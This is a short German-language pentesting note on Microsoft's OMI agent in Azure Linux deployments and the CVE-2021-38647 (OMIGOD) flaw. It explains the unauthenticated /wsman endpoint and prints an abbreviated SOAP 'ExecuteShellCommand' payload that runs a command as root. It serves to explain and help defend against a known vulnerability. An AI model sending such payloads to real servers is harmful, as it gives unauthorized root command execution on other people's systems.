Grundlegende Informationen

OMI wird von Microsoft als Open-Source-Tool präsentiert und ist für die Remote-Konfigurationsverwaltung konzipiert. Es ist besonders relevant für Linux-Server in Azure, die Dienste wie folgt nutzen:

• Azure Automation

• Azure Automatic Update

• Azure Operations Management Suite

• Azure Log Analytics

• Azure Configuration Management

• Azure Diagnostics

Der Prozess omiengine wird gestartet und lauscht auf allen Schnittstellen als Root, wenn diese Dienste aktiviert sind.

Die verwendeten Standardports sind 5985 (http) und 5986 (https).

CVE-2021-38647 Schwachstelle

Wie am 16. September beobachtet, sind Linux-Server, die in Azure bereitgestellt werden und die genannten Dienste nutzen, aufgrund einer verwundbaren Version von OMI anfällig. Diese Schwachstelle liegt in der Handhabung von Nachrichten durch den OMI-Server über den /wsman-Endpunkt, ohne dass ein Authentifizierungsheader erforderlich ist, was den Client fälschlicherweise autorisiert.

Ein Angreifer kann dies ausnutzen, indem er eine "ExecuteShellCommand" SOAP-Payload ohne Authentifizierungsheader sendet, wodurch der Server Befehle mit Root-Rechten ausführt.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Für weitere Informationen zu dieser CVE überprüfen Sie dies.

Referenzen

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/